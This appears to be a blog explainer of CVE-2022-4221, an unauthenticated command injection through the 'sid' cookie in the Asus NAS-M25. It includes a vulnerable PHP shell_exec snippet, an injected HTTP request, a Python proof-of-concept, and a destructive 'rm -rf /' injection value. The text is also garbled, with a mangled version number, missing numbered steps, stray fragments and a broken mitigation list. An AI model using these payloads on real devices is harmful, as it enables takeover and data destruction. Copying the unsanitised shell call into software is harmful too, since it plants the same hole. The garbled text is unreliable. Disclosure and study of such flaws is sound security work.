CVE-2022-4221 - How a Cookie Opened the Door to the Asus NAS-M25 – Command Injection Explained and Exploited

Asus is a big name in networking, and their NAS-M25 is a convenient network-attached storage device used in homes and small offices. But what if a simple, unsanitized cookie value let an unauthenticated attacker take over your files, see passwords, or trash your device? That’s exactly what happened with CVE-2022-4221. Let’s break down this real vulnerability in simple language, see some code, and understand how attackers could exploit it.

What Is CVE-2022-4221?

The vulnerability, tracked as CVE-2022-4221, happens because the NAS-M25’s web application fails to properly “clean” cookie values before stuffing them into system shell commands. That means, if you send a web request to the NAS-M25 with a specially-crafted cookie, you might be able to make the device run ANY command—without logging in.

Affected versions: Asus NAS-M25 through firmware version 1..1.7.

How the Flaw Happens – Simple Explanation

When you visit the NAS-M25’s web interface, your browser sends cookies. For some functions, the server reads a cookie (for example, called sid) and runs shell scripts using its value—without filtering out dangerous characters.

If your sid is 123, that’s fine. But if it’s 123; rm -rf /, the system might interpret that as two commands: use 123 as usual, then run rm -rf /—which means deleting every file.

Let’s imagine an (oversimplified) code snippet from the NAS’s web interface

<?php
// PHP code handling HTTP cookies
$sid = $_COOKIE['sid']; // Get sid cookie from user

// Dangerous! Passing cookie directly into shell command
$output = shell_exec("/usr/bin/session_check $sid");
echo $output;
?>

No checks, no escapes—completely trusts the incoming cookie.

Suppose an attacker sends this HTTP request to the NAS box

GET /web/login.html HTTP/1.1
Host: vulnerable-nas
Cookie: sid=123;uname -a > /tmp/hacked

`

/usr/bin/session_check 123;uname -a > /tmp/hacked

`

2. The semicolon splits the command: the server checks session 123, then runs uname -a and writes output to /tmp/hacked.

Now, the attacker can check /tmp/hacked (or pick another payload) to confirm code execution.

Here’s a basic script to test if a NAS box is vulnerable (for security research!)

import requests

TARGET = "http://192.168.1.100";
INJECTION = "sid=123;id>/tmp/poc4221"

cookies = {"sid": '123;id>/tmp/poc4221'}

r = requests.get(f"{TARGET}/index.php", cookies=cookies)
print("Check /tmp/poc4221 on the NAS for output.")

If the file /tmp/poc4221 appears on the target, the bug is live!

* Attackers could

- Read files (e.g., /etc/shadow for password hashes).

Destroy or encrypt your data (ransomware).

* All without any valid login—just a single web hit.

References and Original Disclosures

- NIST's CVE Record for CVE-2022-4221
- VulDB Entry with More Technical Details

(If you find this, keep an eye on vendor advisories as well: Asus Security Advisories)

Never expose NAS devices directly to the Internet unless necessary.

3. Segment your network—put sensitive devices on their own VLANs or restrict access using firewalls.

Quick Summary

CVE-2022-4221 is a severe command injection vulnerability in Asus NAS-M25 (up to version 1..1.7), allowing attackers to run OS commands using unsanitized cookies—no password needed. This real-world flaw is a reminder for everyone: always sanitize inputs, especially when using them in system calls. If you use or manage an Asus NAS-M25, update now and check your network exposure.


*Stay safe out there—vulnerabilities like this are a reminder that even simple cookies can crumble your defenses if left unchecked.*

Timeline

Published on: 12/01/2022 10:15:00 UTC
Last modified on: 12/05/2022 15:11:00 UTC